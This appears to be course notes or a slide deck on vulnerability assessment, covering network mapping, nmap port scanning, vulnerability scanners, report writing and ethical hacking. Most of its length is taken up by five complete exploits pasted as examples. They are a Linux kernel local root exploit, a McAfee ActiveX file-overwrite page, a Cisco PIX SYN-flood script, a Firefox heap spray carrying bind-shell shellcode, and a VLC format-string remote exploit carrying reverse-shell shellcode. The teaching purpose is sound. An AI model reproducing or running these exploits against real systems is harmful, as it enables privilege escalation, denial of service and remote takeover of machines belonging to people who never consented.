You are on page 1of 23

Vulnerability Assessment: A vulnerability Assessment is the

process of identifying, quantifying, and prioritizing (ranking) the
vulnerabilities in a system. The discipline of vulnerability
assessment comprises host-based vulnerability assessment,
related to the inside configuration of a host, and network-based
vulnerability assessment, focused on the vulnerabilities visible
and exploitable on the network.

Both kinds of vulnerability assessment are
required for maximum effectiveness, as vulnerabilities can be
exploited by an entity inside the security perimeter (i.e.a
legitimate user), or initiated from outside the perimeter, by an
unauthorised or illegitimate user.

Remote vs local attacks:

Why we need VA ?
 To create a healthy Network.
 To prevent outside (unauthorised) user.
 To be Hack proof
 To create a secure software
What all can be Vulnerable ?

 OS (Operating System)

 AV (Antivirus)

 Firewall

 Browsers

 Applications (Desktop/Web-Based)

Example(OS)
/***********************************************************
* hoagie_udp_sendmsg.c
* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698
*
* udp_sendmsg bug exploit via (*output) callback function
* used in dst_entry / rtable
*
* Bug reported by Tavis Ormandy and Julien Tinnes
* of the Google Security Team
*
* Tested with Debian Etch (r0)
*
* $ cat /etc/debian_version
* 4.0
* $ uname -a
* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
GNU/Linux
* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
* $ ./hoagie_udp_sendmsg
* hoagie_udp_sendmsg.c - linux root < 2.6.19 local
* -andi / void.at
*
* sh-3.1# id
* uid=0(root) gid=0(root)
Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000
(andi)
* sh-3.1#
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* andi@void.at
* http://www.void.at
*
************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
* this code will be called from NF_HOOK via (*output) callback in kernel mode
*/
void set_current_task_uids_gids_to_zero() {
asm("push %eax\n"
"movl $0xffffe000, %eax\n"
"andl %esp, %eax\n"
"movl (%eax), %eax\n"
"movl $0x0, 0x150(%eax)\n"
"movl $0x0, 0x154(%eax)\n"
"movl $0x0, 0x158(%eax)\n"
"movl $0x0, 0x15a(%eax)\n"
"movl $0x0, 0x160(%eax)\n"
"movl $0x0, 0x164(%eax)\n"
"movl $0x0, 0x168(%eax)\n"
"movl $0x0, 0x16a(%eax)\n"
"pop %eax\n");
}

int main(int argc, char **argv) {
int s;
struct msghdr header;
struct sockaddr_in sin;
char *rtable = NULL;

fprintf(stderr,
"hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n"
"-andi / void.at\n\n");

s = socket(PF_INET, SOCK_DGRAM, 0);
if (s == -1) {
fprintf(stderr, "[*] can't create socket\n");
exit(-1);
}

/**
* initialize required variables
*/
memset(&header, 0, sizeof(struct msghdr));
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("127.0.0.1");
sin.sin_port = htons(22);
header.msg_name = &sin;
header.msg_namelen = sizeof(sin);

/**
* and this is the trick:
* we can use (*output)(struct sk_buff*) from dst_entry (used by rtable)
as a callback (=> offset 0x74)
* so we map our rtable buffer at offset 0 and set output callback function
*
* struct dst_entry
* {
* struct dst_entry *next;
* atomic_t __refcnt; client references
* int __use;
* struct dst_entry *child;
* struct net_device *dev;
* short error;
* short obsolete;
* int flags;
* #define DST_HOST 1
* #define DST_NOXFRM 2
* #define DST_NOPOLICY 4
* #define DST_NOHASH 8
* #define DST_BALANCED 0x10
* unsigned long lastuse;
* unsigned long expires;
*
* unsigned short header_len; * more space at head
required *
* unsigned short trailer_len; * space to reserve at
tail *
*
* u32 metrics[RTAX_MAX];
* struct dst_entry *path;
*
* unsigned long rate_last; * rate limiting for
ICMP *
* unsigned long rate_tokens;
*
* struct neighbour *neighbour;
* struct hh_cache *hh;
* struct xfrm_state *xfrm;
*
* int (*input)(struct sk_buff*);
* int (*output)(struct sk_buff*);
*
* #ifdef CONFIG_NET_CLS_ROUTE
* __u32 tclassid;
* #endif
*
* struct dst_ops *ops;
* struct rcu_head rcu_head;
*
* char info[0];
* };
*
* struct rtable
* {
* union
* {
* struct dst_entry dst;
* struct rtable *rt_next;
* } u;
*
* struct in_device *idev;
*
* unsigned rt_flags;
* __u16 rt_type;
* __u16 rt_multipath_alg;
*
* __be32 rt_dst; * Path destination *
* __be32 rt_src; * Path source *
* int rt_iif;
*
* * Info on neighbour *
* __be32 rt_gateway;
*
* * Cache lookup keys *
* struct flowi fl;
*
* * Miscellaneous cached information *
* __be32 rt_spec_dst; * RFC1122 specific
destination *
* struct inet_peer *peer; * long-living peer info *
* };
*
*/
rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (rtable == MAP_FAILED) {
fprintf(stderr, "[*] mmap failed\n");
exit(-1);
}
*(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;

/* trigger exploit
*
* the second sendmsg() call will call ip_append_data() with rt == NULL
* because of:
* if (up->pending) {
* *
* * There are pending frames.
* * The socket lock must be held while it's corked.
* *
* lock_sock(sk);
* if (likely(up->pending)) {
* if (unlikely(up->pending != AF_INET)) {
* release_sock(sk);
* return -EINVAL;
* }
* goto do_append_data;
* }
* release_sock(sk);
* }
*
*/
sendmsg(s, &header, MSG_MORE|MSG_PROXY);
sendmsg(s, &header, 0);

close(s);

system("/bin/sh");

return 0;
}

// milw0rm.com [2009-09-02]

Example(AV):

GOODFELLAS Security Research TEAM
http://goodfellas.shellcode.com.ar
Greetings to str0ke

McAfee, Inc. 3.6.0.608 Policy Manager naPolicyManager.dll Arbitrary Data Write
==============================================================================

Internal ID: VULWAR20090616.
-----------

Introduction
------------

naPolicyManager.dll is a library included in the Program Mc Afee inc.

Tested In
---------

- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.

Summary
-------

The WriteTaskDataToIniFile method doesn't check if it's being called from the
application or from a malicious user. A Remote Attacker could craft a
html page and overwrite arbitrary files in a system.

Impact
------

The vulnerability could allow malicious users to write arbitrary data on a
vulnerable system that uses this software.

Workaround
----------

- Activate the Kill bit zero in the clsid corresponding to the software.
- Unregister naPolicyManager.dll using regsvr32.

Timeline
--------

July 16 2009 -- Bug Discovery.
July 16 2009 -- POC published.

Credits
-------

* callAX <bemariani@gmail.com>
Technical Details
-----------------

WriteTaskDataToIniFile method receives one argument filename in this format
"c:\path\file".

Proof of Concept
---------------

<HTML>
<BODY>
<object id=ctrl classid="clsid:{04D18721-749F-4140-AEB0-
CAC099CA4741}"></object>
<SCRIPT>
function Do_1t()
{
File = "C:\b00t.ini"
ctrl.WriteTaskDataToIniFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>

# milw0rm.com [2009-06-16]

Example(Firewall):
# The easy way by logic logidev@gmail.com (line 2) untested /str0ke
# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx

#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not
installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed
\n" if $@;
eval ("use Term::ProgressBar;");
die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions (
"help" =>\$usage,
"device=s" => \$device,
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);

######################## Config option ####################

my $timeout = "0,1"; # Timeout
if ($usage) {&usage;}

if (!$device) {
$device= 'eth0'; # Network device
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SET
my $tcpdata = "TEST"; # TCP payload
my $count=0;

######################################################

#Initialize Progres Bar
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);

if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else {
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}

for ($count=0; $count< 65537 ; $count++) {

$packet->set({

ip => {
saddr => $sourceip,
daddr => $destip
},

tcp => {
check => 0x0010 , # TCP Packet Checksum 0 for auto correct
source => $count,
dest => $tcpport,
syn => $syn,
data => $tcpdata
}});
$packet->ethsend($timeout);
#$packet->send($timeout);

$progress->update($_);
$count++;
}

sub usage {
print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs
and comments to info@arhont.com

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
[--destmac=MAC] [--port=n]

Options:

--help This message
--device Network interface (defaut set eth0)
--source Victim source IP
--dest Victim destination IP
--sourcemac Victim source MAC
--destmac MAC Address of the gateway
--port TCP port

Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest
192.168.55.111 \
--sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22
EOF

exit shift;
}

# milw0rm.com [2005-11-23]

Example(Browser):
##################################################
# FireFox 3.5 Heap Spray
# Discovered by: Simon Berry-Bryne
# Coded in Perl by netsoul, ALTO PARANA - Paraguay
# Contact: netsoul2 [at] gmail [dot] com
##################################################

#!/usr/bin/perl -w
use strict;
use POE::Component::Server::HTTP;
POE::Component::Server::HTTP->new(Port => my $port = 8080,
ContentHandler => {"/" => sub{$_[1]->push_header("Content-Type",
"text/html"), $_[1]->content(<DATA>)}});

print "[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30
secs try with netcat for connect in port 5500\n";
POE::Kernel->run();

__DATA__
<html>
<head>
<title>Exploiting Firefox 3.5</title>
<script language= javascript>
//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai
var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b
%u8b3c%u057c%u0178%u8bef" +
"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac
%u74c0%uc107%u0dca" +
"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b
%u8b4b%u1c5f%ueb01" +
"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b
%u8b30%u0c40%u708b%uad1c%u408b" +
"%u5e08%u8e68%u0e4e%u50ec%ud6ff
%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" +
"%ucb68%ufced%u503b%ud6ff%u895f
%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" +
"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff
%u6866%u7c15%u5366%ue189" +
"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue9
2e%uff57%u53d6" +
"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue7
68%uc679%u5779" +
"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a
%u2959%u89cc%u6ae7%u8944" +
"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab
%u7268%ub3fe%uff16" +
"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff
%uad68%u05d9%u53ce" +
"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff
%uff52%u68d0%uceef%u60e0" +
"%uff53%uffd6%u41d0");
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()

function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);$poe_kernel
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}

function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>

# milw0rm.com [2009-07-20]

Example(Application):
/* Epibite // bite since 1442
* pown meme ta mamie
*/

/* Advisory from Luigi Auriemma
* CVE-2007-6682 / format string in VideoLAN VLC 0.8.6d
*
* Description :
* Format string vulnerability in the httpd_FileCallBack
* function (network/httpd.c) in VideoLAN VLC 0.8.6d allows
* remote attackers to execute arbitrary code via format
* string specifiers in the Connection parameter.
*/

/* La faille n'a d'interet que dans un but d'apprentissage
* d'une technique avance d'exploitation des chaines de
* format.
*
* Toute la difficulte de l'exploitation est liee au fait
* que la chaine de format se trouve dans un thread, et
* la pile remplie avec des adresses du tas.
* On est donc oblige d'utiliser la technique dite de
* "l'ebp chaining".
*
* On pardonnera le manque de proprete et de portabilite,
* defauts qui sont expliques et corriges durant son
* utilisation sur la plateforme de tutoriaux de
* l'Epitech Security Laboratory.
*/

/* Traduction:
* This is ugly and not cross plateform, use it for
* learning purpose. (^-^)
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#include <netinet/in.h>
#include <arpa/inet.h>

#include <sys/types.h>
#include <sys/socket.h>

int connect_(char *, int);
void exit_(int, char *);
char *get_payload(unsigned short, unsigned short/* , unsigned short * */);
void progressbar(void);
void write_short(unsigned short, unsigned short);

#define REQUEST "GET / HTTP/1.0\r\n" \
"Connection: "

/* Chaining ebp // FREEBSD8 - 0.8.6d :
*
* (0xbf5fa838) -> 0xbf5fafa8 // 12$ httpd_FileCallBack()
* _____________/
* /
* (0xbf5fafa8) -> 0xbf5fafe8 // 488$ httpd_HostThread()
* _____________/
* /
* (0xbf5fafe8) -> 0x00000000 // 504$ pthread_getprio()
*
* (0xbfbee2b8) // (bf5f)e2b8 is an eip value
* because we write short by short,
* we've just have to write (bfbe)
* in order to have the sc addr.
* (0xbf5fa83c) // An eip -> 12$ + 4
*/

#define FIRST_EBP 12
#define SECOND_EBP 488
#define THIRD_EBP 504

#define FBSD8_ESP ( 0xbf5fa808 )
#define FBSD8_SCADDR ( 0xbfbee2b8 )

int port;
char *ip;

/* bsd_ia32_reverse - LHOST=127.0.0.1 LPORT=4321 Size=92
http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c"
"\x3c\x56\xcc\x83\xeb\xfc\xe2\xf4\x06\x5d\x0e\x55\x3e\x7e\x04\x8e"
"\x3e\x54\x29\xcc\x6c\x3d\x9b\x4c\x04\x2c\x54\xdc\x8d\xb5\xb7\xa6"
"\x7c\x6d\x06\x9d\xfb\x56\x34\x94\xa1\xbc\x3c\xce\x35\x8c\x0c\x9d"
"\x3b\x6d\x9b\x4c\x25\x45\xa0\x9c\x04\x13\x79\xbf\x04\x54\x79\xae"
"\x05\x52\xdf\x2f\x3c\x68\x05\x9f\xdc\x07\x9b\x4c";

int main(int argc, char **argv)
{
unsigned int i;

if (argc < 3)
(void) exit_(1, "Usage: exploit ip port\n");
ip = argv[1];
port = atoi(argv[2]);
printf("[+] Victim is : %s:%d...\n", ip, port);
printf("[+] Shellcode size : %d // located at : 0x%08x\n",
strlen((char *)scode), FBSD8_SCADDR);
printf("[+] EIP is located at : 0x%08x\n", FBSD8_ESP + FIRST_EBP * 4 + 4 +
2);

(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + 2),
FIRST_EBP);
(void) write_short((unsigned short)(FBSD8_SCADDR >> 16), SECOND_EBP);
(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)),
FIRST_EBP);

for (i = 0; i < strlen((char*)scode); i += 2)
{
(void) write_short((unsigned short)(FBSD8_SCADDR + i), SECOND_EBP);
(void) write_short((unsigned short)(*((unsigned short *)(scode + i))),
THIRD_EBP);
}

(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + 2),
FIRST_EBP);
(void) write_short((unsigned short)(FBSD8_ESP >> 16), SECOND_EBP);
(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)),
FIRST_EBP);
(void) write_short((unsigned short)(FBSD8_ESP + FIRST_EBP * 4 + 4 + 2),
SECOND_EBP);
(void) write_short((unsigned short)(FBSD8_SCADDR >> 16), THIRD_EBP);

printf("[+] Done.\n");
return (0);
}

char *get_payload(unsigned short data,
unsigned short pop
/* unsigned short *offset */)
{
static char buffer[32];
char buffi[9];

/* data = data - *offset; */
if ((unsigned short)data < 8)
{
memset(buffi, '0', 9);
buffi[data] = '\0';
sprintf(buffer, "%s%%%d$hn", buffi, pop);
}
else
sprintf(buffer, "%%%du%%%d$hn", data, pop);
/* *offset = *offset + data; */
return (buffer);
}

void write_short(unsigned short data, unsigned short pop)
{
char buff[1024];
int ret;
int sock;

memset(buff, '\0', 42);
strcat(buff, REQUEST);
strcat(buff, get_payload(data, pop));
strcat(buff, "\r\n\r\n");
sock = connect_(ip, port);
if (write(sock, buff, strlen(buff)) < (int)strlen(buff))
(void) exit_(1, "[-] write()\n");
while ((ret = read(sock, buff, 1024)))
;
if (close(sock) < 0)
(void) exit_(1, "[-] close()\n");
return ;
}

void exit_(int i, char *tyop)
{
write(2, tyop, strlen(tyop));
(void) exit(i);
}

int connect_(char *ip, int port)
{
int sock;
struct sockaddr_in s;

(void) progressbar();
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
(void) exit_(1, "[-] socket()\n");
bzero(&s, sizeof(s));
s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr.s_addr = inet_addr(ip);
if (connect(sock, (struct sockaddr *)&s, sizeof(s)) < 0)
(void) exit_(1, "[-] connect()\n");
return (sock);
}

void progressbar(void)
{
static unsigned int c = 0;

write(1, "D ", 12
- write(1, "[?] 8=====", 5 + ((c >> 2 & 1 ? -1 : 1)
* (++c & 3)
+ (c % 0x20 & 100))));
write(1, "p0wn in progress", 19);
write(1, "...", c / 4 % 4);
write(1, " \r", 4);
return ;
}

// milw0rm.com [2008-04-28]

Anatomy of a network-based vulnerability assessment:

 The purpose of a network-based vulnerability assessment is
to compile an
 inventory of systems and services attached to the network
and, for each
 system and service, identify the weaknesses and
vulnerabilities visible and
 exploitable on the network, also taking advantage of the
attacker’s
 techniques. The activity aims at remotely assessing a
network by finding
 vulnerabilities on its systems. Results are eventually
consolidated in a report

Steps:

Target acquisition:

 To acquire complete knowledge of the network environment
to analyse,identifying all the alive hosts and network-
attached devices (including network
 equipments, network printers, etc.) residing on the portion of
network under analysis, along with their available services

Selective protection:
 We cannot protect everything (too expensive)
 We are asked to choose what to protect, and how.
 Choice on the basis of our model of classification
Network mapping:
 Many different ways (as testing may be performed under
various constraints and conditions):
 1. Starting from the network topology …. when available ;-)
 2. System-provided tools and information (i.e. ping and
traceroute, ICMP queries, routing tables, DNS interrogation
with nslookup, DNS zone transfers, etc.)
 3. Specific tools (i.e. nmap, fping, pinger, etc.) Theoretically
any layer in the ISO-OSI model can provide useful
information. In practice, is carried out mainly by using
ICMP, TCP or UDP protocols,
 combinations of the above protocols, or protocols residing on
upper layers.
 • Also referred as IP scanning, host discovery, etc.

Port mapping:
 Port mapping (also known as port scanning) is the process of
connecting to TCP and UDP ports of the target system to
determine what ports are in a
 LISTENING state, possibly identifying also the running
services.

More specifically:

 1. Identifying the TCP and UDP ports in a LISTENING state;
 2. Identifying the TCP and UDP services running on the
target system;
 3. Identifying RPC registered RPC programs running on the
target system;
 4. Identifying services unintentionally exposed

An example of port mapping (using nmap)
 • Carried-out with programs known as port mappers or port
scanners (i.e. nmap,
 strobe, netcat)
# nmap -sTU 10.0.1.1
Starting nmap by fyodor@insecure.org (www.insecure.org/nmap/)
Interesting ports on puma.mydomain.com(10.0.1.3):
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
69/udp open tftp
80/tcp open http
111/tcp open sunrpc
111/udp open sunrpc
177/udp open xdmcp
2049/tcp open nfs
2049/udp open nfs
6000/tcp open X11
Nmap run completed -- 1 IP address (1 host up) scanned in 13
seconds
ports in LISTENING state
expected running service
(IANA numbers)
http://www.iana.org/assignments/port-numbers

Network-based vulnerability scanning programs
Vulnerability scanners take the concept of a port scanner to
the next level. The vulnerability scanner identifies not just
hosts and open ports but any associated
vulnerabilities automatically instead of relying on human
interpretation of the results Automated network-based
vulnerability scanning programs assist in:
1. extracting information from the target hosts (O.S. version,
open ports, active services and
protocols, version of each running service, exported
resources and shares, valid accounts),
this phase is also referred as enumeration
2. checking all the details against publicly available sources
of known vulnerability information
and vendor security alerts to see if known potential
vulnerabilities may affect the host
3. performing tests and use heuristics to confirm the
existence of a real vulnerability (whenever
possible and according to the level of aggressiveness
chosen)
4. rating the risk of the vulnerability
5. mapping each finding to their related security advisory or
alert
6. providing fixing direction
7. creating reports

Available programs
 ARC SARA - Security Auditor's Research Assistant
 eEye Digital Security Retina
 BindView
 CyberCop Scanner
 ISS Internet Security Scanner
 ISS Internet Scanner
 Kane Security Analyst
 NA CyberCop Scanner
 Nessus
 Symantec NetRecon
 Saint corporation Saint (formerly WWDSI)
 Satan - Security Administrator Tool for Analyzing Networks
 Vigilante SecureScan NX
… and many others!

Vulnerability confirmation
 Not all potential vulnerabilities will be confirmed as real
vulnerabilities during the tests. Some network-based
vulnerability assessment programs are able to distinguish
between a potential vulnerability and a confirmed
vulnerability.
 Exploit code, often available from public security resources,
can be used to confirm the existence of real vulnerabilities.
 Unstructured and manual activity, typically performed by
matching information from multiple resources.
 Regardless of the success or failure to exploit a potential
vulnerability, the underlying vulnerability may still exist.
Potential vulnerabilities should therefore be treated with the
same seriousness as confirmed vulnerabilities.
 Some manual activity still required for double checking
(manual tests, check the server log, etc.)
 false negatives

Hierarchy of threats
 The question is a little more difficult to answer and takes
experience along with knowing how the threat was carried
out. Which factors contribute more to a website defacement?
The Operating System or the type of web server running on
the Operating System?
 We need a hierarchy of threats. Although the threat is still
the website defacement, an attacker could use multiple
methods to deface a site. The threat probability is then a
combination of which methods of attack are the most
popular, along with which system configurations are most
susceptible to those popular attacks

Security report
 • Eventually all the findings are to be consolidated in a final
security report.
 Different levels of information can be included, depending on
the audience:
 technical details, including directions and fix information, for
system
 administrators; summaries for security managers; and high-
level graph and trend reports for executives. The aim is
twofold: reports are both input for operative directions and
auditing records.
 The value of a vulnerability assessment activity is tied to its
ability to assist in the remediation of the vulnerabilities
found, therefore the final report shouldn’t be just a collection
of problems but it must include specific advice on how to
close the vulnerabilities.

The report should describe at least
 1. scope and methodology
 2. detailed findings and directions for improvements,
possibly indexed by risk priority,
 for the technical personnel. Links to vendor advisories
 3. recommendation to avoid the same findings in the future
 4. high level management reports, possibly including historic
trends, giving an overall
 perspective of an organisation’s security posture
 5. general recommendations and conclusions
 • A vulnerability assessment does not last forever, rather the
final report is strictly
 linked to the timeframe when the scan was performed. A
vulnerability
 assessment is therefore inherently not exhaustive and the
faithfulness of the
 final report decreases with time.
 • As people operate computers and networks, and people
make mistakes, the
 vulnerability assessment must be a periodic and iterative
process.

Good candidates for ethical hacking
 • hacker noun 1. A computer hacker is someone who tries to
break into
 computer systems, especially in order to get secret or
confidential
 information that is stored there.
 • (Collins COBUILD English dictionary)
 • “Ethical” hackers employ the same tools and techniques as
“criminal” hackers,
 but they would neither damage the target systems nor steal
information. Instead
 they evaluate the target systems’ security and report back
to the owners with
 the vulnerability they found and instructions on how to
remedy them.
 • Ethical hackers must be completely trustworthy. While
conducting security tests,
 the ethical hacker may discover information that should
remain secret, and
 therefore must be trusted to exercise tight control over any
information about a
 target that could be misused.